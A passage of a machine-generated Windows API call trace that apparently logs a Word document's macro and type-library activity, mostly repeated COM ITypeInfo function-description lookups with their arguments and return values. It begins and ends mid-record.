[0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaf, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb0, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb2, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xba, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbb, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbc, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbd, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbe, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbf, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc2, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xca, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcb, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcc, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcd, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xce, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcf, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.340] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd2, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd8, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xda, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdb, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdc, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdd, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xde, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdf, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe2, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.341] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xea, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xeb, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xec, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xed, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xee, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xef, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf2, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf3, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf6, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.342] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.343] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186c98 | out: pVarVal=0x186c98*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.343] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.343] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186c90, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186ba0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.343] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.343] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c14010, cb=0x62) returned 0x6c6a1f0 [0041.343] IMalloc:Alloc (This=0x7feffc15380, cb=0xc0) returned 0x6c2bb70 [0041.343] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c2bb70) returned 0xc0 [0041.345] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186ec0, pDummy=0x69d77b0 | out: ppTypeAttr=0x186ec0, pDummy=0x69d77b0*=0x7) returned 0x0 [0041.345] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.345] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a86110, index=0x0, pRefType=0x186eb8 | out: pRefType=0x186eb8*=0x3) returned 0x0 [0041.345] ITypeInfo:GetRefTypeInfo (in: This=0x6a86110, hreftype=0x3, ppTInfo=0x186ec8 | out: ppTInfo=0x186ec8*=0x6bbd1c8) returned 0x0 [0041.345] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.345] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x186ec0, pDummy=0x186e98 | out: ppTypeAttr=0x186ec0, pDummy=0x186e98*=0x3) returned 0x0 [0041.345] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0041.345] ITypeInfo:GetRefTypeOfImplType (in: This=0x6bbd1c8, index=0x0, pRefType=0x186eb8 | out: pRefType=0x186eb8*=0x182) returned 0x0 [0041.345] ITypeInfo:GetRefTypeInfo (in: This=0x6bbd1c8, hreftype=0x182, ppTInfo=0x186ec8 | out: ppTInfo=0x186ec8*=0x6bbd220) returned 0x0 [0041.345] IUnknown:Release (This=0x6bbd1c8) returned 0x1 [0041.345] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd220, ppTypeAttr=0x186ec0, pDummy=0x186ea0 | out: ppTypeAttr=0x186ec0, pDummy=0x186ea0*=0x186ed0) returned 0x0 [0041.345] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd220) returned 0x0 [0041.345] IUnknown:Release (This=0x6bbd220) returned 0x1 [0041.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015de83298", cchWideChar=11, lpMultiByteStr=0x186eb0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015de83298", lpUsedDefaultChar=0x0) returned 11 [0041.345] GetLocalTime (in: lpSystemTime=0x186f98 | out: lpSystemTime=0x186f98*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x346)) [0041.345] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c68fb4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="075de83298", cchWideChar=11, lpMultiByteStr=0x186ef0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="075de83298", lpUsedDefaultChar=0x0) returned 11 [0041.346] IMalloc:Alloc (This=0x7feffc15380, cb=0x60) returned 0x6c6a260 [0041.346] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c6a260) returned 0x60 [0041.346] IMalloc:Free (This=0x7feffc15380, pv=0x6c6a260) [0041.346] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba42e0, cb=0x200) returned 0x6ad7b90 [0041.346] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.346] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x186a38 | out: ppvObject=0x186a38*=0x6a86060) returned 0x0 [0041.346] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186a48 | out: pVarVal=0x186a48*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.346] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.346] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186a40, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186a60 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186a60*="") returned 0x0 [0041.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186950, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.346] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.346] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186a40, pDummy=0x0 | out: ppTypeAttr=0x186a40, pDummy=0x0) returned 0x0 [0041.347] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4, ppFuncDesc=0x186a18, 